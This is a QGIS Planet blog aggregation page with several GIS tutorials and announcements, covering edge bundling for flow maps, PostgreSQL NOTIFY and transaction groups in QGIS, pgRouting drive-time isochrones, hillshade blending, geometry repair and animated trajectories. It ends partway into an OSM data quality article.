
QGIS Planet

Movement data in GIS #8: edge bundling for flow maps

If you follow this blog, you’ll probably remember that I published a QGIS style for flow maps a while ago. The example showed domestic migration between the nine Austrian states, a rather small dataset. Even so, it required some manual tweaking to make the flow map readable. Even with only 72 edges, the map quickly gets messy:

Raw migration flows between Austrian states, line width scaled by flow strength

One popular approach in the data viz community to deal with this problem is edge bundling. The idea is to reduce visual clutter by generating bundles of similar edges.

Surprisingly, edge bundling is not available in desktop GIS. Existing implementations in the visual analytics field often run on GPUs because edge bundling is computationally expensive. Nonetheless, we have set out to implement force-directed edge bundling for the QGIS Processing toolbox [0]. The resulting scripts are available at https://github.com/dts-ait/qgis-edge-bundling.

The main procedure consists of two tools: bundle edges and summarize. Bundle edges takes the raw straight lines, incrementally adds intermediate nodes (called control points), and shifts them according to computed spring and electrostatic forces. If the input is 72 lines, the output is again 72 lines, but each line geometry has been bent so that similar lines overlap and form a bundle.

After this edge bundling step, most common implementations compute a line heatmap, that is, for each map pixel, determine the number of lines passing through the pixel. But QGIS does not support line heatmaps and this approach also has issues distinguishing lines that run in opposite directions. We have therefore implemented a summarize tool that computes the local strength of the generated bundles.

Continuing our previous example: if the input is 72 lines, summarize breaks each line into its individual segments and determines the number of segments from other lines that are part of the same bundle. If a weight field is specified, each line is not simply counted once but weighted by its weight value. The resulting bundle strength can be used to create a line layer style with data-defined line width:

Bundled migration flows

To avoid overlaps of flows in opposing directions, we define a line offset. Finally, summarize also adds a sequence number to the line segments. This sequence number is used to assign a line color on the gradient that indicates flow direction.

I already mentioned that edge bundling is computationally expensive. One reason is that we need to perform pairwise comparison of edges to determine if they are similar and should be bundled. This comparison results in a compatibility matrix and depending on the defined compatibility threshold, different bundles can be generated.
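
To give an idea of what this pairwise comparison involves, here is a minimal, self-contained sketch (for illustration only, not the actual code from the qgis-edge-bundling repository) that scores edge pairs by direction similarity alone and applies a compatibility threshold; the published method combines several such measures (angle, length, position, visibility):

# Minimal sketch of a pairwise edge compatibility matrix (illustration only,
# not the actual qgis-edge-bundling code): edges are (x1, y1, x2, y2) tuples
# and the score only compares edge directions.
import numpy as np

def angle_compatibility(e1, e2):
    v1 = np.array([e1[2] - e1[0], e1[3] - e1[1]], dtype=float)
    v2 = np.array([e2[2] - e2[0], e2[3] - e2[1]], dtype=float)
    cos = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
    return abs(cos)  # 1.0 = parallel, 0.0 = perpendicular

edges = [(0, 0, 10, 10), (1, 0, 11, 9), (0, 10, 10, 0)]
n = len(edges)
compatibility = np.array([[angle_compatibility(edges[i], edges[j])
                           for j in range(n)] for i in range(n)])
compatible = compatibility >= 0.6  # only edge pairs above the threshold may be bundled
print(compatible)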

The following U.S. dataset contains around 4000 lines and bundling it takes a considerable amount of time.

One approach to speed up computations is to first use a quick clustering algorithm and then perform edge bundling on each cluster individually. If done correctly, clustering significantly reduces the size of each compatibility matrix.

In this example, we divided the edges into six clusters before bundling them. If you compare this result to the visualization at the top of this post (which did not use clustering), you’ll see some differences here and there but, overall, the results are quite similar:

Looking at these examples, you’ll probably spot a couple of issues. There are many additional ideas for potential improvements from existing literature which we have not implemented yet. If you are interested in improving these tools, please go ahead! The code and more examples are available on Github.

For more details, leave your email in a comment below and I’ll gladly send you the pre-print of our paper.

[0] Graser, A., Schmidt, J., Roth, F., & Brändle, N. (2017 online) Untangling Origin-Destination Flows in Geographic Information Systems. Information Visualization – Special Issue on Visual Movement Analytics.



Oslandia is baking some awesome QGIS 3 new features

QGIS 3.0 is now getting closer and closer, so it's the right moment to write about some of the major refactoring and new features we have been baking at Oslandia.

A quick word about the release calendar: you probably thought the QGIS 3 freeze was expected for the end of August, didn't you?

In fact, we have so many major changes in the queue that the steering committee (PSC), advised by the core developers, decided to push the release date back twice, up to the 27th of October. The release date has not been pushed back again (yet).

At Oslandia we got involved in a dark list of hidden features of QGIS 3.

They mostly aren't easy to advertise visually, but you'll appreciate them for sure!

  • Add capabilities to store data in the project
    • add a new .qgz zipped file format container
    • have editable joins, with upsert capabilities (insert or update)
    • transparently store data in an SQLite database and keep it in sync. Now custom labeling is pretty easy!
  • Coordinating work and tests on the new node tool for data editing
  • Improving Z/M handling in edit tools and layer creation dialogs
  • Ticket reviewing and cleaning

Next articles will describe some of those tasks soon.

This work was a great opportunity to ramp up a talented new developer with commit rights on the repository! Welcome and congratulations to Paul, our new core committer!

All this was possible with the support of many actors, but also thanks to the funding from QGIS.org via grant applications and direct funding of QGIS Server!

One last word: please help us test QGIS 3. It's the perfect moment to stress it, as the bugfix period is about to start!

 

 

 

Refresh your maps FROM PostgreSQL!

Continuing our love story with PostgreSQL and QGIS, we submitted a grant application to QGIS.org in early spring 2017.

The idea was to take advantage of very advanced PostgreSQL features that had probably never been used in a desktop GIS client before.

Today, let’s see what we can do with the PostgreSQL NOTIFY feature!

Ever dreamt of being able to trigger things from outside QGIS? Ever wanted a magic wand to trigger actions in some clients from a database event?


 

NOTIFY is a PostgreSQL-specific feature that allows generating notifications on a channel, optionally with a message (a "payload" in PostgreSQL parlance).

In short, from within a transaction, we can raise a signal in a PostgreSQL queue and listen to it from a client.

In action

We hardcoded a channel named “qgis” and made QGIS able to LISTEN to NOTIFY events and transform them into Qt’s signals. The signals are connected to layer refresh when you switch on this rendering option.

Optionally, adding a message filter will only redraw the layer for specific events.
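
This also means that any client able to reach the database can trigger a refresh. Here is a minimal sketch using psycopg2; the connection parameters and the 'my_layer' payload are placeholders, and the payload only matters if a message filter is configured:

# Minimal sketch: send a notification on the hardcoded "qgis" channel from
# outside QGIS, e.g. from a script or ETL job (connection parameters and the
# payload value are placeholders).
import psycopg2

conn = psycopg2.connect("dbname=gis user=gisuser")
conn.autocommit = True  # notifications are delivered on commit
with conn.cursor() as cur:
    cur.execute("SELECT pg_notify('qgis', 'my_layer');")  # payload can match a message filter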

This mechanism is really versatile, and we can now imagine many possibilities: triggering a notification message to your users from the database, interacting with plugins, or even coding a chat between users of the same database (OK, this is silly)!

 

More than just refreshing layers?

The first implementation we chose was to trigger a layer refresh because we believe this is a good way for users to discover this new feature.

But QGIS rocks, hey, and doing crazy things for limited use cases is not the way to go.

Thanks to feedback on the Pull Request, we added the possibility to trigger layer actions on notification.

That should be pretty versatile since you can do almost anything with those actions now.

Caveats

QGIS will open a permanent connection to PostgreSQL to watch the notify signals. Please keep that in mind if you have several clients and a limited number of connections.

Notify signals are only transmitted with the transaction, i.e. when the COMMIT is issued. So be aware that this might not help you if users are inside an edit session.

QGIS has a lot of different caches, for the attribute table for instance. We currently have no specific way to invalidate a particular cache and then tell QGIS to refresh its attribute table.

There is no way in PostgreSQL to list all channels of a database session, which is why we couldn't offer a combo box of available channels in the rendering options dialog. Anyway, to avoid too many issues, we decided to hardcode the channel name in QGIS as "qgis". If this is somehow not enough for your needs, please contact us!

Conclusion

The GitHub pull request is here: https://github.com/qgis/QGIS/pull/5179

We are convinced this will be really useful for real-time applications; let us know if it rings a bell on your side!

More to come soon, stay tuned!

 

 

Undo/redo stack is back: QGIS transaction groups

Let's keep looking at what we did as part of the QGIS.org grant application from early spring 2017.

At Oslandia, we use the transaction group option of QGIS a lot. It was an experimental feature in QGIS 2.x that opens a single common PostgreSQL transaction for all layers sharing the same connection string.

Transaction group option

When activated, that option will bring many killer features:

  • Users can switch all the layers in edit mode at once. A real time saver.
  • Every INSERT, UPDATE or DELETE is forwarded immediately to the database, which is nice for:
    • Evaluating on the fly whether database constraints are satisfied or not. Without transaction groups this is only done when saving the edits, and it can be frustrating to create dozens of features and then have one of them rejected because of a foreign key constraint…
    • Having triggers evaluated on the fly. QGIS is so powerful when dealing with “thick database” concepts that I would never go back to a pure GIS that ignores how powerful databases can be!
    • Playing with QgsTransaction.ExecuteSQL allows triggering stored procedures in PostgreSQL in a beautiful API-style interface. Something like
SELECT invert_pipe_direction('pipe1');
  • However, the implementation was flagged “experimental” because some caveats were still causing issues:
    • Committing on the fly was breaking the logic of the undo/redo stack, so there was no way to undo a local edit. No Ctrl+Z! The only way to roll back was to stop the edit session and lose all the work. Ouch… Bad!
    • Playing with ExecuteSQL did not dirty the QGIS edit buffer. So, if during an edit session no edit action was made using QGIS native tools, there was no clean way to activate the “save edits” icon.
    • When some triggers failed, QGIS could lose the DB connection and thus end up with a silent ROLLBACK.

We decided to try to restore the undo/redo stack by saving the edit history as PostgreSQL SAVEPOINTs and seeing if we could restore the original feature in QGIS.
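
Conceptually, a savepoint is taken before each edit, and undoing an edit rolls back to the savepoint taken just before it. The following is a minimal sketch of the underlying SQL mechanism using psycopg2 and a hypothetical pipes table; QGIS manages these savepoints internally, so this only illustrates the idea:

# Sketch of the SAVEPOINT mechanism behind the restored undo/redo
# (hypothetical table and connection parameters; QGIS does this internally).
import psycopg2

conn = psycopg2.connect("dbname=gis user=gisuser")
cur = conn.cursor()  # an implicit transaction starts with the first statement

cur.execute("SAVEPOINT before_edit_1")
cur.execute("UPDATE pipes SET diameter = 300 WHERE id = 1")  # edit #1
cur.execute("SAVEPOINT before_edit_2")
cur.execute("UPDATE pipes SET diameter = 400 WHERE id = 2")  # edit #2
cur.execute("ROLLBACK TO SAVEPOINT before_edit_2")           # Ctrl+Z: undo edit #2 only
conn.commit()                                                # edit #1 is kept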

And.. it worked!

Let’s see that in action:

 

Potential caveats ?

At first, we worried about how heavy all those savepoints would be for the database. It turns out that, maybe for really massive geometries and heavy editing sessions, this could start to weigh a bit, but it honestly stays far below PostgreSQL's capabilities.

 

So far, we haven't really found any issue with it.

And we didn't address the silent ROLLBACK that occurs sometimes, because it is generated by buggy stored procedures, which are easy to fix.

Some new ideas came to us while working in this area. For instance, if a transaction locks a feature, QGIS just… waits for the lock to be released. I think we should find a way to advertise those locks to the users; that would be great! If you're interested in making that happen, please contact us.

 

More to come soon, stay tuned!

 

 

PyQGIS course, 13–14 November 2017 in Neuchâtel

The course is fully booked. The course is aimed at advanced QGIS users who want to expand their capabilities through the use of Python in QGIS. During this training, we will cover various ways of interacting with the QGIS API as well as the

Drive-time Isochrones from a single Shapefile using QGIS, PostGIS, and Pgrouting

This is a guest post by Chris Kohler.

Introduction:

This guide provides step-by-step instructions to produce drive-time isochrones using a single vector shapefile. The method described here involves building a routing network from a single vector shapefile of your roads data within a VirtualBox virtual machine. The network is built by creating start and end nodes (source and target nodes) on each road segment. We will use PostgreSQL, with the PostGIS and pgRouting extensions, as our database. Please consider the accuracy of this type of routing to be approximate, as the routing algorithms are based on node locations rather than specific addresses. I am currently working on an improved workflow that uses site address points as nodes to optimize results. One of the many benefits of this workflow is that it costs nothing to produce (apart from collecting your roads data). I will provide instructions for creating and using your virtual machine within this guide.

Steps: –Getting VirtualBox (begin)–

Intro 1. Download/install Oracle VM VirtualBox (https://www.virtualbox.org/wiki/Downloads).

Intro 2. Download/install OSGeo-Live 11 (https://live.osgeo.org/en/overview/overview.html).

Pictures used in this workflow will show 10.5, though version 11 can be applied similarly. Make sure you download the version: osgeo-live-11-amd64.iso. If you have trouble finding it, here is the direct link to the download (https://sourceforge.net/projects/osgeo-live/files/10.5/osgeo-live-10.5-amd64.iso/download)
Intro 3. Ready for virtual machine creation: We will use the downloaded OSGeo-Live 11 suite with a virtual machine we create to begin our workflow. The steps to create your virtual machine are listed below. Also, here are steps from an earlier workshop with additional details on setting up your virtual machine with OSGeo-Live (http://workshop.pgrouting.org/2.2.10/en/chapters/installation.html).

1. Create Virtual Machine: In this step we begin creating the virtual machine housing our database.

Open Oracle VM VirtualBox Manager and select “New” located at the top left of the window.

VBstep1

Then fill out name, operating system, memory, etc. to create your first VM.

vbstep1.2

2. Add IDE Controller: The purpose of this step is to create a placeholder for the OSGeo-Live 11 suite to be loaded into. In the VirtualBox main window, right-click your newly created VM and open the settings.

vbstep2

In the settings window, on the left side select the storage tab.

Find the "adds new storage controller" button located at the bottom of the tab. Be careful of the other button labeled "adds new storage attachment"! Click the "adds new storage controller" button and a drop-down menu will appear. From the top of the drop-down, select "Add IDE Controller".

vbstep2.2

vbstep2.3

You will see a new item appear in the center of the window under the “Storage Tree”.

3. Add Optical Drive: The OSGeo-Live 11 suite will be loaded into the virtual machine via an optical drive. Highlight the new IDE controller you created and select "add optical drive".

vbstep3

A new window will pop up; select "Choose Disk".

vbstep3.2

Locate your downloaded file "osgeo-live-11-amd64.iso" and click Open. A new object should appear in the middle window under your new controller, displaying "osgeo-live-11.0-amd64.iso".

vbstep3.3

Finally, your virtual machine is ready for use.
Start your new virtual machine, then wait and follow the on-screen prompts to begin using it.

vbstep3.4

–Getting Virtual Box(end)—

4. Creating the routing database, and both extensions (postgis, pgrouting): The database we create and both extensions we add will provide the functions capable of producing isochrones.

To begin, open the command line tool (press Ctrl+Alt+T), then log in to PostgreSQL by typing "psql -U user" into the command line and pressing Enter. For the purpose of clear instruction, I will refer to the database in this guide as "routing"; feel free to choose your own database name. Input the command below to create the database:

CREATE DATABASE routing;

You can use “\c routing” to connect to the database after creation.

step4

The next step after creating and connecting to your new database is to create both extensions. I find it easier to kill two birds with one stone by typing "psql -U user routing", which logs you into PostgreSQL and connects to the routing database at the same time.

When you're logged into your database, run the commands below to add both extensions:

CREATE EXTENSION postgis;
CREATE EXTENSION pgrouting;

step4.2

step4.3

5. Load shapefile to database: In this next step, the shapefile of your roads data must be placed into your virtual machine and further into your database.

My method is to email myself the roads shapefile, then download and copy it from within the virtual machine's web browser. From the desktop of your virtual machine, open the folder named "Databases" and select the application "shp2pgsql".

step5

Follow the UI of shp2pgsql to connect to your routing database you created in Step 4.

step5.2

Next, select “Add File” and find your roads shapefile (in this guide we will call our shapefile “roads_table”) you want to use for your isochrones and click Open.

step5.3

Finally, click “Import” to place your shapefile into your routing database.

6. Add source & target columns: The purpose of this step is to create columns which will serve as placeholders for our nodes data we create later.

There are multiple ways to add these columns into the roads_table. The most important part of this step is which table you choose to edit, the names of the columns you create, and the format of the columns. Take time to ensure the source & target columns are integer format. Below are the commands used in your command line for these functions.

ALTER TABLE roads_table ADD COLUMN "source" integer;
ALTER TABLE roads_table ADD COLUMN "target" integer;

step6

step6.2

7. Create topology: Next, we will use a function to attach a node to each end of every road segment in the roads_table. The function in this step will create these nodes. These newly-created nodes will be stored in the source and target columns we created earlier in step 6.

As well as creating nodes, this function will also create a new table which contains all these nodes. The suffix "_vertices_pgr" is added to the name of your shapefile to create this new table. For example, using our guide's shapefile name, "roads_table", the nodes table will be named accordingly: roads_table_vertices_pgr. However, we will not use the new table created by this function (roads_table_vertices_pgr). Below is the function, and a second simplified version, to be used in the command line for populating our source and target columns, in other words creating our network topology. Note the input format: the "geom" column in my case was called "the_geom" within my shapefile:

SELECT pgr_createTopology('roads_table', 0.001, 'geom', 'id',
 'source', 'target', rows_where := 'true', clean := false);

step7

Here is a direct link for more information on this function: http://docs.pgrouting.org/2.3/en/src/topology/doc/pgr_createTopology.html#pgr-create-topology

Below is an example(simplified) function for my roads shapefile:

SELECT pgr_createTopology('roads_table', 0.001, 'the_geom', 'id')

8. Create a second nodes table: A second nodes table will be created for later use. This second node table will contain the node data generated from pgr_createtopology function and be named “node”. Below is the command function for this process. Fill in your appropriate source and target fields following the manner seen in the command below, as well as your shapefile name.

To begin, find the folder on the virtual machine's desktop named "Databases" and open the program "pgAdmin III" located within.

step8

Connect to your routing database in pgAdmin window. Then highlight your routing database, and find “SQL” tool at the top of the pgAdmin window. The tool resembles a small magnifying glass.

step8.2

We input the below function into the SQL window of pgAdmin. Feel free to refer to this link for further information: (https://anitagraser.com/2011/02/07/a-beginners-guide-to-pgrouting/)

CREATE TABLE node AS
   SELECT row_number() OVER (ORDER BY foo.p)::integer AS id,
          foo.p AS the_geom
   FROM (     
      SELECT DISTINCT roads_table.source AS p FROM roads_table
      UNION
      SELECT DISTINCT roads_table.target AS p FROM roads_table
   ) foo
   GROUP BY foo.p;

step8.3

9. Create a routable network: After creating the second node table in step 8, we will combine this node table (node) with our shapefile (roads_table) into one new table (network) that will be used as the routing network. This table will be called "network" and will be capable of processing routing queries. Please input this command and execute it in the SQL pgAdmin tool as we did in step 8. Here is a reference for more information: (https://anitagraser.com/2011/02/07/a-beginners-guide-to-pgrouting/)

step8.2

 

CREATE TABLE network AS
   SELECT a.*, b.id as start_id, c.id as end_id
   FROM roads_table AS a
      JOIN node AS b ON a.source = b.the_geom
      JOIN node AS c ON a.target = c.the_geom;

step9.2

10. Create a "noded" view of the network: This new view will be used to calculate the visual isochrones in later steps. Input this command and execute it in the SQL pgAdmin tool.

CREATE OR REPLACE VIEW network_nodes AS 
SELECT foo.id,
 st_centroid(st_collect(foo.pt)) AS geom 
FROM ( 
  SELECT network.source AS id,
         st_geometryn (st_multi(network.geom),1) AS pt 
  FROM network
  UNION 
  SELECT network.target AS id, 
         st_boundary(st_multi(network.geom)) AS pt 
  FROM network) foo 
GROUP BY foo.id;

step10

11. Add column for speed: This step may or may not apply, depending on whether your original shapefile contains a field with road speed values.

In reality, a road network will typically contain multiple speed limits. The shapefile you choose may have a speed field; without one, the following steps will not allow varying speeds to be applied to your routing network.

If speed values exist in your shapefile, we will use them to populate a new field, "traveltime", that stores the travel time for every road segment in our network based on its geometry. First, we need to create a column to store the individual travel times. The name of our column will be "traveltime", using the format double precision. Input this command and execute it in the command line tool as seen below.

ALTER TABLE network ADD COLUMN traveltime double precision;

step11

Next, we will populate the new "traveltime" column by calculating travel times using an equation. This equation takes each road segment's length (shape_leng) and divides it by the rate of travel (either mph or kph). The sample command below uses mph as the rate, while the geometry (shape_leng) units of my roads_table are in feet. Input this command and execute it in the SQL pgAdmin tool. The variable "X" is explained in more detail below.

UPDATE network SET traveltime = shape_leng / X*60

step11.2

How to find X, here is an example: take 30 mph as the rate. To find X, we convert 30 miles to feet; since 5280 ft = 1 mile, we multiply 30 by 5280, which gives us 158400 ft. Our rate has been converted from 30 miles per hour to 158400 feet per hour. For a rate of 30 mph, the equation for the "traveltime" field becomes "shape_leng / 158400*60" (the result is in minutes). To restrict this calculation's output, we add a condition such as "where speed = 30;", which applies the calculated value only to features with a value of 30 in the "speed" field. Note: your "speed" field may be named differently.

UPDATE network SET traveltime = shape_leng / 158400*60 where speed = 30;

Repeat this step for each speed value in your shapefile. Examples:

UPDATE network SET traveltime = shape_leng / X*60 where speed = 45;
UPDATE network SET traveltime = shape_leng / X*60 where speed = 55;
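
If your shapefile contains many distinct speed values, this repetition can be scripted. Here is a minimal sketch using psycopg2; the connection parameters and speed list are placeholders, and it assumes lengths in feet and speeds in mph as in the example above:

# Sketch: compute X for each speed value and run the corresponding UPDATE
# (assumes lengths in feet and speeds in mph, as in the example above).
import psycopg2

conn = psycopg2.connect("dbname=routing user=user")
with conn, conn.cursor() as cur:
    for speed in (30, 45, 55):          # the speed values present in your data
        x = speed * 5280                # mph converted to feet per hour
        cur.execute(
            "UPDATE network SET traveltime = shape_leng / %s * 60 WHERE speed = %s;",
            (x, speed),
        )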

The back end is done. Great Job!

Our next step will be visualizing our data in QGIS. Open and connect QGIS to your routing database by right-clicking "PostGIS" in the Browser Panel within the QGIS main window. Confirm that the checkbox "Also list tables with no geometry" is checked, to allow you to see the interior of your database more clearly. Fill out the name of your routing database and click "OK".

If done correctly, you will have access from QGIS to the tables and views created in your routing database. Feel free to visualize your network by dragging and dropping the network table into your QGIS Layers Panel. From here you can use the identify tool to select a road segment and see the source and target nodes contained within it. The node you choose will be used in the next step to create the drive-time views.

12. Create views: In this step, we create views from a function designed to determine the travel time cost. Transforming these views with tools will visualize the travel time costs as isochrones.

The command below is how you start querying your database to create drive-time isochrones. Begin in QGIS by dragging your network table into the contents. The visual will show your network as vector lines. Simply select the road segment closest to the point of interest you would like to build your isochrone around. Then identify the road segment using the identify tool and locate the source and target fields.

step12

step12.2

Place the source or target field value in the command below where you see VALUE, in all caps.

This will serve you now as an isochrone catchment function for this workflow. Please feel free to use this command repeatedly for creating new isochrones by substituting the source value. Please input this command and execute in SQL pgAdmin tool.

*AT THE BOTTOM OF THIS WORKFLOW I PROVIDED AN EXAMPLE USING SOURCE VALUE “2022”

CREATE OR REPLACE VIEW "view_name" AS
SELECT di.seq, 
       di.id1, 
       di.id2, 
       di.cost, 
       pt.id, 
       pt.geom 
FROM pgr_drivingdistance('SELECT
     gid::integer AS id, 
     Source::integer AS source, 
     Target::integer AS target,                                    
     Traveltime::double precision AS cost 
       FROM network'::text, VALUE::bigint,
    100000::double precision, false, false)
    di(seq, id1, id2, cost)
JOIN network_nodes pt ON di.id1 = pt.id;

step12.3

13. Visualize Isochrone: Applying tools to the view will allow us to adjust the visual aspect into a more suitable isochrone overlay.

After creating your view, a new item is created in your routing database, using the "view_name" you chose. Drag and drop this item into your QGIS Layers Panel. You will see lots of small dots, which represent the nodes.

In the figure below, I named my view "take1".

step13

Each node you see contains a drive-time value, “cost”, which represents the time used to travel from the node you input in step 12’s function.

step13.2

Start by installing the QGIS plugin "Interpolation" by opening the Plugin Manager in the QGIS interface.

step13.3

Next, at the top of QGIS window select “Raster” and a drop-down will appear, select “Interpolation”.

step13.4

 

A new window pops up and asks you for input.

step13.5

Select your "view" as the vector layer, select "cost" as your interpolation attribute, and then click "Add".

step13.6

A new vector layer will show up at the bottom of the window; make sure its type is Points. For the output, on the other half of the window, keep the interpolation method as "TIN", and edit the output file location and name. Check the box "Add result to project".

Note: decreasing the cellsize of X and Y will increase the resolution but at the cost of performance.

Click “OK” on the bottom right of the window.

step13.7

A black and white raster will appear in QGIS, and a new item will be added to the Layers Panel.

step13.8

Take some time to visualize the raster by coloring and adjusting values in symbology until you are comfortable with the look.

step13.9

step13.10

14. Create contours of our isochrone: Contours can be calculated from the isochrone as well.

Near the top of the QGIS window, open the "Raster" menu drop-down and select Extraction → Contour.

step14

Fill out the appropriate interval between contour lines but leave the check box “Attribute name” unchecked. Click “OK”.

step14.2

step14.3

15. Zip and Share: Find where you saved your TIN and contours, and compress them into a zip folder by highlighting them both, right-clicking, and selecting "compress". Email the compressed folder to yourself to export it out of your virtual machine.

Example Isochrone catchment for this workflow:

CREATE OR REPLACE VIEW "2022" AS 
SELECT di.seq, Di.id1, Di.id2, Di.cost,                           
       Pt.id, Pt.geom 
FROM pgr_drivingdistance('SELECT gid::integer AS id,                                       
     Source::integer AS source, Target::integer AS target, 
     Traveltime::double precision AS cost FROM network'::text, 
     2022::bigint, 100000::double precision, false, false) 
   di(seq, id1, id2, cost) 
JOIN network_nodes pt
ON di.id1 = pt.id;

References: Oracle VM VirtualBox, OSGeo-Live 11 amd64 ISO, FOSS4G Bonn workshop (http://workshop.pgrouting.org/2.2.10/en/index.html)

Adding ESRI’s World Hillshade layer to QGIS

You may have seen my earlier tutorial where I described how to make nice-looking hillshaded maps in QGIS using SRTM elevation data. Well, we don't have to stop at just one hillshade layer on a map: it is possible to overlay multiple hillshades, a procedure that can increase the visual quality and detail. The following image is the hillshade we made before. Once you re-create a hillshade, following the previous tutorial, you can head to the next step (note that brightness and contrast settings may be different due to changes in how QGIS generates and displays hillshades).

We can improve the SRTM hillshade further by adding ESRI's World Hillshade layer, which uses multi-directional illumination (also called a Swiss hillshade, in tribute to the celebrated Swiss cartographer Eduard Imhof). In addition, World Hillshade has a much higher resolution than 30 m SRTM data in some regions of the world: 2 m for most of England and Wales, 10 m for most of the US, 5 m for Spain, 3 m for the Netherlands, etc. The only drawback is that the style of this layer is somewhat controversial (some love it, some hate it), since it looks like it is illuminated from directly above, but mixing it with the SRTM hillshade obviates some of its criticised flaws.

To add the World Hillshade layer in QGIS go to the Layer Menu – Add Layer – Add ArcGIS MapServer Layer – click New and add the following URL:

https://services.arcgisonline.com/arcgis/rest/services/Elevation/World_Hillshade/MapServer

Notice that QGIS 2.18 no longer needs a plugin to add ESRI layers; it now has this functionality built in. Also, if you open the URL in a browser such as Firefox, it brings up a web page that describes the layer, along with links to other layers. Yes, they can all be added to QGIS by simply taking the URL of the web page that describes the layer and connecting to it via the ArcGIS MapServer layer connector.

Name the layer World Hillshade and click Connect, then click and highlight the layer it connects to. Finally, click the Add button to add the layer to the canvas.

Next, we need to adjust the properties of the World Hillshade layer to properly overlay it above the SRTM hillshade layer. Make sure the World Hillshade layer is the topmost layer. In the Layers Panel, right-click the layer, open its properties, and in the window that opens up click Style (if not visible). Next, change the layer blending mode (under Color Rendering) to Overlay. Adjust the layer's brightness to around -20 and leave the contrast at 0. If you find the scene is still too dark, brighten the SRTM hillshade by increasing that layer's brightness. You may also have to lower the Min value of the Min/Max value boxes. Leave the contrast at 0 for the SRTM hillshade, and don't brighten it too much, as it might become washed out and lose detail, especially in bright areas. Play around with the controls; settings may vary depending on the SRTM data you download and the version of QGIS you use.

Here's a comparison in Ireland: a ring-like structure of hills with a central peak. No, it's not a meteorite crater. It's a different kind of geological marvel, the Slieve Gullion Complex and its ring dyke, the deeply eroded remains of a 410-million-year-old Caledonian volcano. The SRTM hillshade is on the left and World Hillshade + SRTM hillshade is on the right (click on the image, it's best appreciated full size):

We can see that the World Hillshade + SRTM hillshade layer shows much finer detail. We see a parallel array of roughly north-south oriented lines; these are fractures and faults that cut the Slieve Gullion Complex and were perhaps enhanced by glacial erosion. Also, look carefully: there seem to be some roads meandering across the landscape (hint: bottom of the map and right of the scale bar). You should get even better results with higher-resolution World Hillshade data. We also notice that blending the SRTM-derived hillshade with World Hillshade adds a naturalistic illumination not apparent in multi-directional hillshading. So we have the best of both worlds: a high-resolution hillshade and realistic-looking illumination.

Hope you found this tutorial helpful.

References:

Baxter, S., 2008. A Geological Field Guide to Cooley Gullion, Mourne & Slieve Croob [pdf]. Geological Survey of Ireland, Dublin. p. 43-53.

Imhof, E. 1982. Cartographic Relief Presentation. Walter de Gruyter GmbH & Co KG.

Fixing invalid polygon geometries

Invalid geometries can cause a lot of headache: from missing features to odd analysis results.

This post aims to illustrate one of the most common issues and presents an approach that can help with these errors.

The dataset used for this example is the Alaska Shapefile from the QGIS sample data:

This dataset has a couple of issues. One way to find out if a dataset contains errors is the Check Validity tool in the Processing toolbox:

If there are errors, a layer called Error output will be loaded. In our case, there are multiple issues:

If we try to use this dataset for spatial analysis, there will likely be errors. For example, using the Fixed distance buffer tool results in missing features:

Note the errors in the Processing log message panel:

Feature ### has invalid geometry. Skipping ...

So what can we do?

In my experience, GRASS can work wonders for fixing these kinds of issues. The idea is to run v.buffer.distance with the distance set to zero:

This will import the dataset into GRASS and run the buffer algorithm without actually growing the polygons. Finally, it should export a fixed version of the geometries:

A quick validity check with the Check validity tool confirms that there are no issues left.
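
The same zero-distance buffer trick can also be applied outside of GRASS, for example with Shapely. Here is a minimal sketch using a hypothetical self-intersecting "bowtie" polygon (note that buffering by zero can drop parts of such a shape, so always check the result):

# Sketch of the zero-distance buffer trick with Shapely, on a hypothetical
# self-intersecting "bowtie" polygon (parts of the original shape can be
# dropped when the geometry is rebuilt, so inspect the output).
from shapely.geometry import Polygon

bowtie = Polygon([(0, 0), (2, 2), (2, 0), (0, 2)])  # two edges cross, so it is invalid
print(bowtie.is_valid)    # False

fixed = bowtie.buffer(0)  # buffering by zero rebuilds a valid geometry
print(fixed.is_valid)     # True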

 

Visualizing 3D data with expressions

How to visualize point data with Z values? Let’s say: we have data about noise pollution in multi-storey buildings. The point data (apartments) looks like this: The attribute table looks like this: We see X and Y coordinates, and a Z (height) value. The DB column gives the actual noise data, which we want to …

Movement data in GIS #7: animated trajectories with TimeManager

In this post, we use TimeManager to visualize the position of a moving object over time along a trajectory. This is another example of what is possible thanks to QGIS’ geometry generator feature. The result can look like this:

What makes this approach interesting is that the trajectory is stored in PostGIS as a LinestringM instead of storing individual trajectory points. So there is only one line feature loaded in QGIS:

(In part 2 of this series, we already saw how a geometry generator can be used to visualize speed along a trajectory.)

The layer is added to TimeManager using t_start and t_end attributes to define the trajectory’s temporal extent.

TimeManager exposes an animation_datetime() function which returns the current animation timestamp, that is, the timestamp that is also displayed in the TimeManager dock, as well as on the map (if we don’t explicitly disable this option).

Once TimeManager is set up, we can edit the line style to add a point marker to visualize the position of the moving object at the current animation timestamp. To do that, we interpolate the position along the trajectory segments. The first geometry generator expression splits the trajectory in its segments:

The second geometry generator expression interpolates the position on the segment that contains the current TimeManager animation time:

The WHEN statement compares the trajectory segment’s start and end times to the current TimeManager animation time. Afterwards, the line_interpolate_point function is used to draw the point marker at the correct position along the segment:

CASE 
WHEN (
m(end_point(geometry_n($geometry,@geometry_part_num)))
> second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
AND
m(start_point(geometry_n($geometry,@geometry_part_num)))
<= second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
)
THEN
line_interpolate_point( 
  geometry_n($geometry,@geometry_part_num),
  1.0 * (
    second(age(animation_datetime(),to_datetime('1970-01-01 00:00')))
	- m(start_point(geometry_n($geometry,@geometry_part_num)))
  ) / (
    m(end_point(geometry_n($geometry,@geometry_part_num)))
	- m(start_point(geometry_n($geometry,@geometry_part_num)))
  ) 
  * length(geometry_n($geometry,@geometry_part_num))
)
END

Here is the animation result for a part of the trajectory between 08:00 and 09:00:




OSM data quality assessment: producing map to illustrate data quality

At Oslandia, we like working with Open Source tools and handling open (geospatial) data. In this article series, we play with OpenStreetMap (OSM) and its data. Here comes the eighth article of this series, dedicated to OSM data quality evaluation through the production of new maps.

1 Description of OSM element

 1.1 Element metadata extraction

As mentioned in a previous article dedicated to metadata extraction, we have to focus on the element metadata itself if we want to produce valuable information about quality. The first questions to answer here are straightforward: what is an OSM element, and how do we extract its associated metadata? This part is relatively similar to the job already done with users.

We know from previous analysis that an element is created during a changeset by a given contributor, may be modified several times by anyone, and may be deleted as well. Such an object may be either a “node”, a “way” or a “relation”. We also know that there may be a set of different tags associated with the element. Of course, the list of every operation associated with each element is recorded in the OSM data history. Let’s consider data around Bordeaux, as in previous blog posts:

import pandas as pd
